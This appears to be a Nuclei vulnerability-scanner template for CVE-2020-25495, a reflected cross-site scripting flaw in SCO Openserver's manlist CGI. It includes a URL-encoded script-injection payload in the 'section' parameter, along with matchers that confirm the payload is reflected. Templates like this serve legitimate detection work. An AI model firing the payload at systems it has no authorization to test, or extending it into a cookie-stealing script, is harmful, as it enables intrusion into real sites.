id: CVE-2020-25495 info: name: SCO Openserver 5.0.7 - 'section' Cross-Site scripting author: 0x_Akoko severity: medium description: A reflected cross-site scripting (XSS) vulnerability in Xinuo (formerly SCO) Openserver version 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section'. reference: - https://www.exploit-db.com/exploits/49300 - https://github.com/Ramikan/Vulnerabilities/blob/master/SCO%20Openserver%20XSS%20%26%20HTML%20Injection%20vulnerability - http://packetstormsecurity.com/files/160634/SCO-Openserver-5.0.7-Cross-Site-Scripting.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-25495 cwe-id: CWE-79 tags: cve,cve2020,sco,xss requests: - method: GET path: - '{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E' matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "

hello

" part: body - type: word words: - "text/html" part: header